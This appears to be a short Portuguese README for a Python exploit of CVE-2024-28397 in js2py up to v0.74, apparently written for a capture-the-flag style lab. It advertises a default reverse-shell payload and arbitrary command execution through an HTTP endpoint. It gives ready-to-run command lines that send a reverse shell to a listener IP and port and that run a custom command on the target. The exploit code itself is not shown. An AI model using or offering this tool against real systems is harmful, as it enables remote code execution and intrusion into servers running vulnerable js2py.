
Script de exploração em Python para CVE-2024-28397 direcionado a js2py <= v0.74. Suporta reverse shell e execução de comandos personalizados via endpoint HTTP.
Payload padrão de reverse shell e argumento de comando opcional permitido
O exploit funciona para js2py <= v0.74
requests (pip install requests)Reverse shell:
python exploit.py 10.129.227.108 /run_code --local_ip 10.10.14.71 --local_port 4444
Comando personalizado:
python exploit.py 10.129.227.108 /run_code --cmd "id"